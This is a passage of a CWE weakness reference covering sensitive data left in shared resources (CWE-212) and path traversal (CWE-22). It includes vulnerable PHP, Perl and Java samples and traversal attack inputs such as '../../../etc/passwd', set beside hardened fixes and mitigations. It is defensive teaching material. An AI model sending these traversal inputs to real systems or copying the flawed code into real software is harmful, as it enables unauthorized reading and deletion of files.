The software uses a resource that contains sensitive data, but it does not properly remove that data before it stores, transfers, or shares the resource with actors in another control sphere.

Extended Description

Resources that may contain sensitive data include documents, packets, messages, databases, etc. While this data may be useful to an individual user or small set of users who share the resource, it may need to be removed before the resource can be shared outside of the trusted group. The process of removal is sometimes called cleansing or scrubbing.

For example, software that is used for editing documents might not remove sensitive data such as reviewer comments or the local pathname where the document is stored. Or, a proxy might not remove an internal IP address from headers before making an outgoing request to an Internet site.

+ Terminology Notes

The terms "cleansing" and "scrubbing" have multiple uses within computing. In information security, these are used for the removal of sensitive data, but they are also used for the modification of incoming/outgoing data so that it conforms to specifications.

+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Confidentiality

Technical Impact: Read files or directories; Read application data

Sensitive data may be exposed to an unauthorized actor in another control sphere. This may have a wide range of secondary consequences which will depend on what data is exposed. One possibility is the exposure of system data allowing an attacker to craft a specific, more effective attack.

+ Demonstrative Examples

Example 1

This code either generates a public HTML user information page or a JSON response containing the same user information.

(Bad Code)
Example Language: PHP 
// API flag, output JSON if set
$json = $_GET['json'];
$username = $_GET['user'];
if (!$json)
{
    $record = getUserRecord($username);
    foreach ($record as $fieldName => $fieldValue)
    {
        if ($fieldName == "email_address") {
            // skip displaying user emails
            continue;
        }
        else {
            writeToHtmlPage($fieldName, $fieldValue);
        }
    }
}
else
{
    $record = getUserRecord($username);
    echo json_encode($record);
}

The programmer is careful not to display the user's e-mail address on the public HTML page. However, the field is never removed from the JSON response, so the e-mail address is still exposed to anyone who requests the JSON output.
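
One way to avoid this class of leak is to restrict every output path, whether HTML or JSON, to an explicit whitelist of public fields before serialization. The following is a minimal Java sketch of that field-filtering idea; the class, method, and field names are illustrative assumptions rather than part of the example above.

(Good Code)
Example Language: Java 
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.Set;

public class PublicProfileFilter {

    // Whitelist of fields that are safe to expose in any public output
    // (HTML or JSON). The field names here are assumptions for illustration.
    private static final Set<String> PUBLIC_FIELDS =
            Set.of("username", "display_name", "bio");

    // Returns a copy of the record that contains only whitelisted fields.
    // The filtered map can then be handed to any serializer.
    public static Map<String, String> toPublicRecord(Map<String, String> record) {
        Map<String, String> publicRecord = new LinkedHashMap<>();
        for (Map.Entry<String, String> entry : record.entrySet()) {
            if (PUBLIC_FIELDS.contains(entry.getKey())) {
                publicRecord.put(entry.getKey(), entry.getValue());
            }
        }
        return publicRecord;
    }
}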

+ Observed Examples
ReferenceDescription
Some image editors modify a JPEG image, but the original EXIF thumbnail image is left intact within the JPEG. (Also an interaction error).
NAT feature in firewall leaks internal IP addresses in ICMP error messages.
+ Potential Mitigations

Phase: Requirements

Clearly specify which information should be regarded as private or sensitive, and require that the product offers functionality that allows the user to cleanse the sensitive information from the resource before it is published or exported to other parties.

Phase: Architecture and Design

Strategy: Separation of Privilege

Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.

Ensure that appropriate compartmentalization is built into the system design and that the compartmentalization serves to allow for and further reinforce privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide when it is appropriate to use and to drop system privileges.

Phase: Implementation

Strategy: Identify and Reduce Attack Surface

Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible.

Effectiveness: Defense in Depth

This makes it easier to spot places in the code where unencrypted sensitive data is being used.
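
As an illustration of this strategy, a dedicated wrapper type can mark sensitive values so that every place they are revealed, logged, or serialized is easy to find during review. The following minimal Java sketch uses only the standard library; the class and method names are assumptions for illustration.

(Good Code)
Example Language: Java 
// A minimal wrapper type that marks a value as sensitive. Code that
// serializes, logs, or transmits data can then be audited by searching
// for uses of SensitiveString rather than for individual field names.
public final class SensitiveString {

    private final String value;

    public SensitiveString(String value) {
        this.value = value;
    }

    // Access to the raw value is explicit, so call sites are easy to find.
    public String reveal() {
        return value;
    }

    // Prevents the raw value from leaking through casual logging or
    // string concatenation.
    @Override
    public String toString() {
        return "[REDACTED]";
    }
}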

Phase: Implementation

Avoid errors related to improper resource shutdown or release (CWE-404), which may leave the sensitive data within the resource if it is in an incomplete state.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfWeakness ClassWeakness Class200Information Exposure
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfWeakness ClassWeakness Class669Incorrect Resource Transfer Between Spheres
Research Concepts1000
ChildOfCategoryCategory8082010 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory963SFP Secondary Cluster: Exposed Data
Software Fault Pattern (SFP) Clusters (primary)888
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanAlsoBeWeakness BaseWeakness Base226Sensitive Information Uncleared Before Release
Research Concepts1000
+ Relationship Notes

This entry is intended to be different from resultant information leaks, including those that occur from improper buffer initialization and reuse, improper encryption, interaction errors, and multiple interpretation errors. This entry could be regarded as a privacy leak, depending on the type of information that is leaked.

There is a close association between CWE-226 and CWE-212. The difference is partially that of perspective. CWE-226 is geared towards the final stage of the resource lifecycle, in which the resource is deleted, eliminated, expired, or otherwise released for reuse. Technically, this involves a transfer to a different control sphere, in which the original contents of the resource are no longer relevant. CWE-212, however, is intended for sensitive data in resources that are intentionally shared with others, so they are still active. This distinction is useful from the perspective of the CWE research view (CWE-1000).

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERCross-Boundary Cleansing Infoleak
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-10-29CWE Content TeamMITREInternal
updated Description, Other_Notes, Relationship_Notes
2009-12-28CWE Content TeamMITREInternal
updated Name
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships, Terminology_Notes
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2012-05-11CWE Content TeamMITREInternal
updated Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2009-12-28Cross-boundary Cleansing Information Leak
2010-02-16Improper Cross-boundary Cleansing

CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Weakness ID: 22
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The software uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the software does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Extended Description

Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escape outside of the restricted location to access files or directories that are elsewhere on the system. One of the most common special elements is the "../" sequence, which in most modern operating systems is interpreted as the parent directory of the current location. This is referred to as relative path traversal. Path traversal also covers the use of absolute pathnames such as "/usr/local/bin", which may also be useful in accessing unexpected files. This is referred to as absolute path traversal.

In many programming languages, the injection of a null byte (the 0 or NUL) may allow an attacker to truncate a generated filename to widen the scope of attack. For example, the software may add ".txt" to any pathname, thus limiting the attacker to text files, but a null injection may effectively remove this restriction.

+ Alternate Terms
Directory traversal
Path traversal:

"Path traversal" is preferred over "directory traversal," but both terms are attack-focused.

+ Terminology Notes

Like other weaknesses, terminology is often based on the types of manipulations used, instead of the underlying weaknesses. Some people use "directory traversal" only to refer to the injection of ".." and equivalent sequences whose specific meaning is to traverse directories.

Other variants like "absolute pathname" and "drive letter" have the *effect* of directory traversal, but some people may not call it such, since it doesn't involve ".." or equivalent.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

Language-independent

+ Common Consequences
ScopeEffect
Integrity
Confidentiality
Availability

Technical Impact: Execute unauthorized code or commands

The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.

Integrity

Technical Impact: Modify files or directories

The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.

Confidentiality

Technical Impact: Read files or directories

The attacker may be able to read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.

Availability

Technical Impact: DoS: crash / exit / restart

The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all, and in the case of a protection mechanism such as authentication, it has the potential to lock out every user of the software.

+ Likelihood of Exploit

High to Very High

+ Detection Methods

Automated Static Analysis

Automated techniques can find areas where path traversal weaknesses exist. However, tuning or customization may be required to remove or de-prioritize path-traversal problems that are only exploitable by the software's administrator - or other privileged users - and thus potentially valid behavior or, at worst, a bug instead of a vulnerability.

Effectiveness: High

Manual Static Analysis

Manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all file access operations can be assessed within limited time constraints.

Effectiveness: High

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Cost effective for partial coverage:

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

The following code could be for a social networking application in which each user's profile information is stored in a separate file. All files are stored in a single directory.

(Bad Code)
Example Language: Perl 
my $dataPath = "/users/cwe/profiles";
my $username = param("user");
my $profilePath = $dataPath . "/" . $username;

open(my $fh, "<$profilePath") || ExitError("profile read error: $profilePath");
print "<ul>\n";
while (<$fh>) {
    print "<li>$_</li>\n";
}
print "</ul>\n";

While the programmer intends to access files such as "/users/cwe/profiles/alice" or "/users/cwe/profiles/bob", there is no verification of the incoming user parameter. An attacker could provide a string such as:

(Attack)
 
../../../etc/passwd

The program would generate a profile pathname like this:

(Result)
 
/users/cwe/profiles/../../../etc/passwd

When the file is opened, the operating system resolves the "../" during path canonicalization and actually accesses this file:

(Result)
 
/etc/passwd

As a result, the attacker could read the entire text of the password file.

Notice how this code also contains an error message information leak (CWE-209) if the user parameter does not produce a file that exists: the full pathname is provided. Because the retrieved file is not output-encoded, there might also be a cross-site scripting problem (CWE-79) if the profile contains any HTML, but other code would need to be examined.

Example 2

In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.

(Bad Code)
Example Language: Java 
String filename = System.getProperty("com.domain.application.dictionaryFile");
File dictionaryFile = new File(filename);

However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory.
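
One possible hardening, sketched below, is to resolve the supplied filename against a fixed base directory and require that the canonicalized result stays underneath it. The base directory, class name, and error handling are assumptions for illustration.

(Good Code)
Example Language: Java 
import java.io.File;
import java.io.IOException;

public class DictionaryLoader {

    // Assumed application directory used as the allowed base.
    private static final File BASE_DIR = new File("/usr/local/application/dictionaries");

    public static File resolveDictionaryFile() throws IOException {
        String filename = System.getProperty("com.domain.application.dictionaryFile");
        if (filename == null) {
            throw new IOException("dictionary file property is not set");
        }

        // Resolve the property relative to the base directory rather than
        // trusting it as an arbitrary pathname.
        File dictionaryFile = new File(BASE_DIR, filename);

        // Canonicalization resolves ".." sequences and symbolic links
        // (CWE-23, CWE-59) before the containment check is made.
        String canonicalBase = BASE_DIR.getCanonicalPath();
        String canonicalTarget = dictionaryFile.getCanonicalPath();
        if (!canonicalTarget.startsWith(canonicalBase + File.separator)) {
            throw new IOException("dictionary file resolves outside of the allowed directory");
        }
        return dictionaryFile;
    }
}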

Example 3

The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path.

(Bad Code)
Example Language: Perl 
my $Username = GetUntrustedInput();
$Username =~ s/\.\.\///;
my $filename = "/home/user/" . $Username;
ReadAndSendFile($filename);

Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as:

(Attack)
 
../../../etc/passwd

will have the first "../" stripped, resulting in:

(Result)
 
../../etc/passwd

This value is then concatenated with the /home/user/ directory:

(Result)
 
/home/user/../../etc/passwd

which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23).

Example 4

The following code attempts to validate a given input path by checking it against a whitelist and, once validated, deletes the given file. In this specific case, the path is considered valid if it starts with the string "/safe_dir/".

(Bad Code)
Example Language: Java 
String path = getInputPath();
if (path.startsWith("/safe_dir/"))
{
    File f = new File(path);
    f.delete();
}

An attacker could provide an input such as this:

(Attack)
 
/safe_dir/../important.dat

The software assumes that the path is valid because it starts with the "/safe_dir/" sequence, but the "../" sequence will cause the program to delete the important.dat file in the parent directory.
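
One way to repair this check, sketched below, is to canonicalize the path before the prefix comparison, so that "../" sequences and symbolic links are resolved first. The safe directory constant and error handling are assumptions for illustration.

(Good Code)
Example Language: Java 
import java.io.File;
import java.io.IOException;

public class SafeDelete {

    private static final String SAFE_DIR = "/safe_dir/";

    public static void deleteInSafeDir(String path) throws IOException {
        File f = new File(path);

        // Resolve "../" sequences and symbolic links before checking the prefix,
        // so "/safe_dir/../important.dat" canonicalizes to "/important.dat"
        // and is rejected.
        String canonical = f.getCanonicalPath();
        if (!canonical.startsWith(SAFE_DIR)) {
            throw new IOException("path is outside of the safe directory");
        }
        if (!f.delete()) {
            throw new IOException("could not delete file");
        }
    }
}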

Example 5

The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The HTML form below sends the upload file request to the Java servlet.

(Good Code)
Example Language: HTML 
<form action="FileUploadServlet" method="post" enctype="multipart/form-data">

Choose a file to upload:
<input type="file" name="filename"/>
<br/>
<input type="submit" name="submit" value="Submit"/>

</form>

When submitted, the Java servlet's doPost method will receive the request, extract the name of the file from the HTTP request header, read the file contents from the request, and output the file to the local upload directory.

(Bad Code)
Example Language: Java 
public class FileUploadServlet extends HttpServlet {

    ...

    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        String contentType = request.getContentType();

        // the starting position of the boundary header
        int ind = contentType.indexOf("boundary=");
        String boundary = contentType.substring(ind+9);

        String pLine = new String();
        String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value

        // verify that content type is multipart form data
        if (contentType != null && contentType.indexOf("multipart/form-data") != -1) {

            // extract the filename from the Http header
            BufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));
            ...
            pLine = br.readLine();
            String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));
            ...

            // output the file to the local upload directory
            try {
                BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));
                for (String line; (line=br.readLine())!=null; ) {
                    if (line.indexOf(boundary) == -1) {
                        bw.write(line);
                        bw.newLine();
                        bw.flush();
                    }
                } //end of for loop
                bw.close();

            } catch (IOException ex) {...}
            // output successful upload response HTML page
        }
        // output unsuccessful upload response HTML page
        else
        {...}
    }
    ...
}

This code does not check the filename that is provided in the header, so an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, including code execution, XSS (CWE-79), or a system crash.

Also, this code does not perform a check on the type of the file being uploaded. This could allow an attacker to upload any executable file or other file with malicious code (CWE-434).
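
A sketch of the two missing checks is shown below: strip any path components from the client-supplied filename and reject unexpected extensions before the file is written. The allowed extensions and class name are assumptions for illustration.

(Good Code)
Example Language: Java 
import java.io.File;
import java.util.Set;

public class UploadFilenameValidator {

    // Assumed whitelist of acceptable upload types (helps to avoid CWE-434).
    private static final Set<String> ALLOWED_EXTENSIONS = Set.of("jpg", "png", "gif");

    // Returns a safe filename or throws if the client-supplied name is unacceptable.
    public static String sanitize(String clientFilename) {
        // Keep only the last path component of the supplied name.
        String name = new File(clientFilename).getName();

        // Reject names that are empty or still contain traversal or separator characters.
        if (name.isEmpty() || name.contains("..")
                || name.indexOf('/') != -1 || name.indexOf('\\') != -1
                || name.indexOf('\0') != -1) {
            throw new IllegalArgumentException("unacceptable filename");
        }

        // Whitelist the file extension.
        int dot = name.lastIndexOf('.');
        String extension = (dot == -1) ? "" : name.substring(dot + 1).toLowerCase();
        if (!ALLOWED_EXTENSIONS.contains(extension)) {
            throw new IllegalArgumentException("unacceptable file extension");
        }
        return name;
    }
}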

+ Observed Examples
ReferenceDescription
Newsletter module allows reading arbitrary files using "../" sequences.
FTP server allows deletion of arbitrary files using ".." in the DELE command.
FTP server allows creation of arbitrary directories using ".." in the MKD command.
OBEX FTP service for a Bluetooth device allows listing of directories, and creation or reading of files using ".." sequences.
Software package maintenance program allows overwriting arbitrary files using "../" sequences.
Bulletin board allows attackers to determine the existence of files using the avatar.
PHP program allows arbitrary code execution using ".." in filenames that are fed to the include() function.
Overwrite of files using a .. in a Torrent file.
Chat program allows overwriting files using a custom smiley request.
Chain: external control of values for user's desired language and theme enables path traversal.
Chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.
+ Potential Mitigations

Phase: Implementation

Strategy: Input Validation

Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a whitelist of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.

When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."

Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a blacklist). A blacklist is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, blacklists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.

When validating filenames, use stringent whitelists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a whitelist of allowable file extensions, which will help to avoid CWE-434.

Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a blacklist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string.
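
As a concrete illustration of the whitelist guidance above, the following Java sketch accepts only filenames built from a small character set with a single "." separator; the exact pattern and length limits are assumptions and would need to match the application's real naming rules.

(Good Code)
Example Language: Java 
import java.util.regex.Pattern;

public class FilenameWhitelist {

    // Letters, digits, '-' and '_', followed by exactly one '.' and a short
    // alphanumeric extension. Directory separators are not accepted, and only
    // one '.' may appear (helps to avoid CWE-23 and CWE-36).
    private static final Pattern SAFE_FILENAME =
            Pattern.compile("[A-Za-z0-9_-]{1,64}\\.[A-Za-z0-9]{1,8}");

    public static boolean isAcceptable(String filename) {
        return filename != null && SAFE_FILENAME.matcher(filename).matches();
    }
}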

Phase: Architecture and Design

For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.

Phase: Implementation

Strategy: Input Validation

Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass whitelist validation schemes by introducing dangerous inputs after they have been checked.

Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links (CWE-23, CWE-59). This includes:

  • realpath() in C

  • getCanonicalPath() in Java

  • GetFullPath() in ASP.NET

  • realpath() or abs_path() in Perl

  • realpath() in PHP

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

Phase: Operation

Strategy: Firewall

Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.

Effectiveness: Moderate

An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.22.5]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Architecture and Design

Strategy: Enforcement by Conversion

When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.

For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [R.22.3] provide this capability.
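
A minimal Java sketch of this mapping approach follows; the IDs and filenames are the illustrative values mentioned above.

(Good Code)
Example Language: Java 
import java.util.Map;

public class ReportFileResolver {

    // Fixed mapping from externally supplied IDs to actual filenames. Any ID
    // outside of this map is rejected, so path characters from the request
    // never reach the filesystem.
    private static final Map<Integer, String> FILES = Map.of(
            1, "inbox.txt",
            2, "profile.txt");

    public static String resolve(int id) {
        String filename = FILES.get(id);
        if (filename == null) {
            throw new IllegalArgumentException("unknown file id");
        }
        return filename;
    }
}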

Phases: Architecture and Design; Operation

Strategy: Sandbox or Jail

Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.

OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.

This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.

Be careful to avoid CWE-243 and other weaknesses related to jails.

Effectiveness: Limited

The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.

Phases: Architecture and Design; Operation

Strategy: Identify and Reduce Attack Surface

Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.

This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface.

Phase: Implementation

Ensure that error messages only contain minimal details that are useful to the intended audience, and nobody else. The messages need to strike the balance between being too cryptic and not being cryptic enough. They should not necessarily reveal the methods that were used to determine the error. Such detailed information can be used to refine the original attack to increase the chances of success.

If errors must be tracked in some detail, capture them in log messages - but consider what could occur if the log messages can be viewed by attackers. Avoid recording highly sensitive information such as passwords in any form. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a username is valid or not.

In the context of path traversal, error messages which disclose path information can help attackers craft the appropriate attack strings to move through the file system hierarchy.

Phases: Operation; Implementation

Strategy: Environment Hardening

When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

+ Weakness Ordinalities
OrdinalityDescription
Primary
(where the weakness exists independent of other weaknesses)
Resultant
(where the weakness is typically related to the presence of some other weaknesses)
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory21Pathname Traversal and Equivalence Errors
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfCategoryCategory632Weaknesses that Affect Files or Directories
Resource-specific Weaknesses (primary)631
ChildOfWeakness ClassWeakness Class668Exposure of Resource to Wrong Sphere
Research Concepts1000
ChildOfWeakness ClassWeakness Class706Use of Incorrectly-Resolved Name or Reference
Research Concepts (primary)1000
ChildOfCategoryCategory715OWASP Top Ten 2007 Category A4 - Insecure Direct Object Reference
Weaknesses in OWASP Top Ten (2007) (primary)629
ChildOfCategoryCategory723OWASP Top Ten 2004 Category A2 - Broken Access Control
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory813OWASP Top Ten 2010 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2010) (primary)809
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory932OWASP Top Ten 2013 Category A4 - Insecure Direct Object References
Weaknesses in OWASP Top Ten (2013) (primary)928
ChildOfCategoryCategory981SFP Secondary Cluster: Path Traversal
Software Fault Pattern (SFP) Clusters (primary)888
ParentOfWeakness BaseWeakness Base23Relative Path Traversal
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base36Absolute Path Traversal
Development Concepts (primary)699
Research Concepts (primary)1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness ClassWeakness Class20Improper Input Validation
Research Concepts1000
CanFollowWeakness ClassWeakness Class73External Control of File Name or Path
Research Concepts1000
CanFollowWeakness ClassWeakness Class172Encoding Error
Research Concepts1000
+ Relationship Notes

Pathname equivalence can be regarded as a type of canonicalization error.

Some pathname equivalence issues are not directly related to directory traversal; rather, they are used to bypass security-relevant checks for whether a file/directory can be accessed by the attacker (e.g. a trailing "/" on a filename could bypass access rules that don't expect a trailing /, causing a server to provide the file when it normally would not).

+ Research Gaps

Many variants of path traversal attacks are probably under-studied with respect to root cause. CWE-790 and CWE-182 begin to cover part of this gap.

Incomplete diagnosis or reporting of vulnerabilities can make it difficult to know which variant is affected. For example, a researcher might say that "..\" is vulnerable, but not test "../" which may also be vulnerable.

Any combination of directory separators ("/", "\", etc.) and numbers of "." (e.g. "....") can produce unique variants; for example, the "//../" variant is not listed (CVE-2004-0325). See this entry's children and lower-level descendants.

+ Affected Resources
  • File/Directory
+ Relevant Properties
  • Equivalence
+ Functional Areas
  • File processing
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERPath Traversal
OWASP Top Ten 2007A4CWE More SpecificInsecure Direct Object Reference
OWASP Top Ten 2004A2CWE More SpecificBroken Access Control
CERT C Secure CodingFIO02-CCanonicalize path names originating from untrusted sources
WASC33Path Traversal
CERT C++ Secure CodingFIO02-CPPCanonicalize path names originating from untrusted sources
Software Fault PatternsSFP16Path Traversal
+ References
[R.22.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 11, "Directory Traversal and Using Parent Paths (..)", Page 370. 2nd Edition. Microsoft. 2002.
[R.22.2] [REF-21] OWASP. "OWASP Enterprise Security API (ESAPI) Project". <http://www.owasp.org/index.php/ESAPI>.
